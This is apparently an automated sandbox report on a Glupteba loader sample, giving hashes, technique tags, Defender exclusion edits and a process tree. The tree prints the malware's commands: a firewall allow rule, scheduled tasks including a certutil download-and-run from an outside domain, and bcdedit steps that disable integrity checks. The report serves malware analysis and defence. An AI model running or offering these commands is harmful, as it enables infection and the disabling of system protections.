glupteba | aae91b20323629b5d0c4a1ed5ad5cf5383730f5233433eba7b450eafec503501

Analysis

max time kernel
131s
max time network
147s
platform
windows10_x64
resource
win10
submitted
25-07-2020 23:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Size

3.8MB
MD5

0d039208c1658b3fc0c7bd9679a1744d
SHA1

adf1b4f1c00301f325036086a882bdb145002588
SHA256

aae91b20323629b5d0c4a1ed5ad5cf5383730f5233433eba7b450eafec503501
SHA512

3e97398f5db4c4549dac9d375e07d4acfc236e477c005d37870b5094d37c27878ab53ad8fadae98fd6f5f3cfc587f0387a2b47a6678234eda3a926797ee23496

Score

10^/10

glupteba discovery dropper evasion loader persistence trojan upx

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 688 created 3060	688	svchost.exe	66
PID 688 created 2064	688	svchost.exe	74
PID 688 created 2064	688	svchost.exe	74
PID 688 created 2064	688	svchost.exe	74
PID 688 created 2064	688	svchost.exe	74

Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

Modifies boot configuration data using bcdedit 15 IoCs

pid	Process
1896	bcdedit.exe
2160	bcdedit.exe
2180	bcdedit.exe
2688	bcdedit.exe
3024	bcdedit.exe
3428	bcdedit.exe
3916	bcdedit.exe
4048	bcdedit.exe
3904	bcdedit.exe
3832	bcdedit.exe
3040	bcdedit.exe
3748	bcdedit.exe
904	bcdedit.exe
424	bcdedit.exe
3484	bcdedit.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\VBoxDrv.sys	dsefix.exe
File created	C:\Windows\System32\drivers\Winmon.sys	csrss.exe

Executes dropped EXE 5 IoCs

pid	Process
2064	csrss.exe
1164	patch.exe
3756	dsefix.exe
2060	windefender.exe
2240	windefender.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000200000001565a-42.dat	upx
behavioral2/files/0x000200000001565a-43.dat	upx
behavioral2/files/0x000200000001565a-48.dat	upx

Loads dropped DLL 4 IoCs

pid	Process
1164	patch.exe
1164	patch.exe
1164	patch.exe
1164	patch.exe

Windows security modification 2 TTPs 12 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\RoughGrass = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\c6def85f9c76\c6def85f9c76 = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\c6def85f9c76.exe = "0"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\RoughGrass = "\"C:\\Windows\\rss\\csrss.exe\""	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
File created	C:\Windows\rss\csrss.exe	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
632	schtasks.exe
800	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-362 = "GTB Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Key created	\REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Control\NetTrace	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2391 = "Aleutian Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-71 = "Newfoundland Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2002 = "Cabo Verde Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2532 = "Chatham Islands Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2452 = "Saint Pierre Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-571 = "China Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2062 = "North Korea Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2141 = "Transbaikal Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2372 = "Easter Island Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
3060	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
3060	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
732	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
732	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
2064	csrss.exe
2064	csrss.exe
2064	csrss.exe
2064	csrss.exe
2064	csrss.exe
2064	csrss.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
616	Process not Found
616	Process not Found

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	3060	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Token: SeImpersonatePrivilege	3060	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
Token: SeTcbPrivilege	688	svchost.exe
Token: SeTcbPrivilege	688	svchost.exe
Token: SeBackupPrivilege	688	svchost.exe
Token: SeRestorePrivilege	688	svchost.exe
Token: SeBackupPrivilege	688	svchost.exe
Token: SeRestorePrivilege	688	svchost.exe
Token: SeBackupPrivilege	688	svchost.exe
Token: SeRestorePrivilege	688	svchost.exe
Token: SeBackupPrivilege	688	svchost.exe
Token: SeRestorePrivilege	688	svchost.exe
Token: SeSystemEnvironmentPrivilege	2064	csrss.exe
Token: SeBackupPrivilege	688	svchost.exe
Token: SeRestorePrivilege	688	svchost.exe
Token: SeBackupPrivilege	688	svchost.exe
Token: SeRestorePrivilege	688	svchost.exe
Token: SeBackupPrivilege	688	svchost.exe
Token: SeRestorePrivilege	688	svchost.exe
Token: SeSecurityPrivilege	2608	sc.exe
Token: SeSecurityPrivilege	2608	sc.exe
Token: SeBackupPrivilege	688	svchost.exe
Token: SeRestorePrivilege	688	svchost.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 688 wrote to memory of 732	688	svchost.exe	70
PID 688 wrote to memory of 732	688	svchost.exe	70
PID 688 wrote to memory of 732	688	svchost.exe	70
PID 732 wrote to memory of 2788	732	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe	71
PID 732 wrote to memory of 2788	732	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe	71
PID 2788 wrote to memory of 3976	2788	cmd.exe	73
PID 2788 wrote to memory of 3976	2788	cmd.exe	73
PID 732 wrote to memory of 2064	732	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe	74
PID 732 wrote to memory of 2064	732	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe	74
PID 732 wrote to memory of 2064	732	SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe	74
PID 688 wrote to memory of 632	688	svchost.exe	76
PID 688 wrote to memory of 632	688	svchost.exe	76
PID 688 wrote to memory of 800	688	svchost.exe	78
PID 688 wrote to memory of 800	688	svchost.exe	78
PID 688 wrote to memory of 1164	688	svchost.exe	80
PID 688 wrote to memory of 1164	688	svchost.exe	80
PID 1164 wrote to memory of 1896	1164	patch.exe	81
PID 1164 wrote to memory of 1896	1164	patch.exe	81
PID 1164 wrote to memory of 2160	1164	patch.exe	83
PID 1164 wrote to memory of 2160	1164	patch.exe	83
PID 1164 wrote to memory of 2180	1164	patch.exe	85
PID 1164 wrote to memory of 2180	1164	patch.exe	85
PID 1164 wrote to memory of 2688	1164	patch.exe	87
PID 1164 wrote to memory of 2688	1164	patch.exe	87
PID 1164 wrote to memory of 3024	1164	patch.exe	89
PID 1164 wrote to memory of 3024	1164	patch.exe	89
PID 1164 wrote to memory of 3428	1164	patch.exe	91
PID 1164 wrote to memory of 3428	1164	patch.exe	91
PID 1164 wrote to memory of 3916	1164	patch.exe	93
PID 1164 wrote to memory of 3916	1164	patch.exe	93
PID 1164 wrote to memory of 4048	1164	patch.exe	95
PID 1164 wrote to memory of 4048	1164	patch.exe	95
PID 1164 wrote to memory of 3904	1164	patch.exe	97
PID 1164 wrote to memory of 3904	1164	patch.exe	97
PID 1164 wrote to memory of 3832	1164	patch.exe	99
PID 1164 wrote to memory of 3832	1164	patch.exe	99
PID 1164 wrote to memory of 3040	1164	patch.exe	101
PID 1164 wrote to memory of 3040	1164	patch.exe	101
PID 1164 wrote to memory of 3748	1164	patch.exe	103
PID 1164 wrote to memory of 3748	1164	patch.exe	103
PID 1164 wrote to memory of 904	1164	patch.exe	105
PID 1164 wrote to memory of 904	1164	patch.exe	105
PID 1164 wrote to memory of 424	1164	patch.exe	107
PID 1164 wrote to memory of 424	1164	patch.exe	107
PID 2064 wrote to memory of 3484	2064	csrss.exe	109
PID 2064 wrote to memory of 3484	2064	csrss.exe	109
PID 2064 wrote to memory of 3756	2064	csrss.exe	111
PID 2064 wrote to memory of 3756	2064	csrss.exe	111
PID 688 wrote to memory of 2060	688	svchost.exe	114
PID 688 wrote to memory of 2060	688	svchost.exe	114
PID 688 wrote to memory of 2060	688	svchost.exe	114
PID 2060 wrote to memory of 2548	2060	windefender.exe	115
PID 2060 wrote to memory of 2548	2060	windefender.exe	115
PID 2060 wrote to memory of 2548	2060	windefender.exe	115
PID 2548 wrote to memory of 2608	2548	cmd.exe	117
PID 2548 wrote to memory of 2608	2548	cmd.exe	117
PID 2548 wrote to memory of 2608	2548	cmd.exe	117

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3060
- C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe
  "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Generic.mg.0d039208c1658b3f.16741.exe"
  2⤵
  - Windows security modification
  - Adds Run key to start application
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:732
- - C:\Windows\System32\cmd.exe
    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2788
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      4⤵
      Modifies data under HKEY_USERS
      PID:3976
- - C:\Windows\rss\csrss.exe
    C:\Windows\rss\csrss.exe ""
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2064
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
      4⤵
      Creates scheduled task(s)
      PID:632
  - - C:\Windows\SYSTEM32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
      4⤵
      Creates scheduled task(s)
      PID:800
  - - C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
      "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1164
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1896
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2160
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2180
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2688
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3024
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3428
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3916
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4048
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3904
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3832
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3040
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -timeout 0
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3748
    - - C:\Windows\system32\bcdedit.exe
        
        C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
        5⤵
